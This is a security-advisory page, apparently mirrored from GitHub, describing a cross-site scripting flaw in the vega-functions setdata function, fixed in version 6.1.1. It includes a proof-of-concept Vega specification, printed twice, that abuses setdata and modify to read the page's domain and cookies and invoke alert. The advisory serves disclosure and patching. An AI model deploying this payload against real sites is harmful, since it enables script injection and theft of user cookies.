Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-m9rg-mr6g-75gm: `vega-functions` vulnerable to Cross-site Scripting via `setdata` function

Impact

For sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the public API) could be used to run unintentional javascript (XSS).

Patches

Fixed in vega-functions 6.1.1

Workarounds

There is no workaround besides upgrading. Using vega.expressionInterpreter as described in CSP safe mode does not prevent this issue.

Exploit Proof of Concept

Vega’s expression modify() function, used by setdata, allows attacker to control both the method called and the values supplied, which results to XSS . This was a previous POC:

{
  "$schema": "https://vega.github.io/schema/vega/v6.json",
  "data": [
    {
      "name": "table",
      "values": [
        {"category": "A", "amount": 28}
      ]
    }
  ],
  "signals": [
    {
      "name": "tooltip",
      "value": {},
      "on": [
        {"events": {"type":"timer","throttle":2000}, "update": "setdata('table',[['Domain: '+event.dataflow._el.ownerDocument.domain+' , cookies: '+ event.dataflow._el.ownerDocument.cookie ]])+warn('XSS is here', modify('table',2,3,null,event.dataflow._el.ownerDocument.defaultView.alert,{'tttt':'yyyy'}) )"},
        {"events": "rect:pointerout",  "update": "{}"}
      ]
    }
  ]
}
ghsa
Open in Source
#xss#js#git#java

Impact

For sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the public API) could be used to run unintentional javascript (XSS).

Patches

Fixed in vega-functions 6.1.1

Workarounds

There is no workaround besides upgrading. Using vega.expressionInterpreter as described in CSP safe mode does not prevent this issue.

Exploit Proof of Concept

Vega’s expression modify() function, used by setdata, allows attacker to control both the method called and the values supplied, which results to XSS . This was a previous POC:

{ "$schema": "https://vega.github.io/schema/vega/v6.json", "data": [ { "name": "table", "values": [ {"category": "A", "amount": 28} ] } ], "signals": [ { "name": "tooltip", "value": {}, "on": [ {"events": {"type":"timer","throttle":2000}, "update": "setdata('table’,[['Domain: ‘+event.dataflow._el.ownerDocument.domain+’ , cookies: '+ event.dataflow._el.ownerDocument.cookie ]])+warn('XSS is here’, modify('table’,2,3,null,event.dataflow._el.ownerDocument.defaultView.alert,{’tttt’:’yyyy’}) )"}, {"events": "rect:pointerout", "update": "{}"} ] } ] }

References

  • GHSA-m9rg-mr6g-75gm

ghsa: Latest News

GHSA-fg6f-75jq-6523: Authlib has 1-click Account Takeover vulnerability
ghsa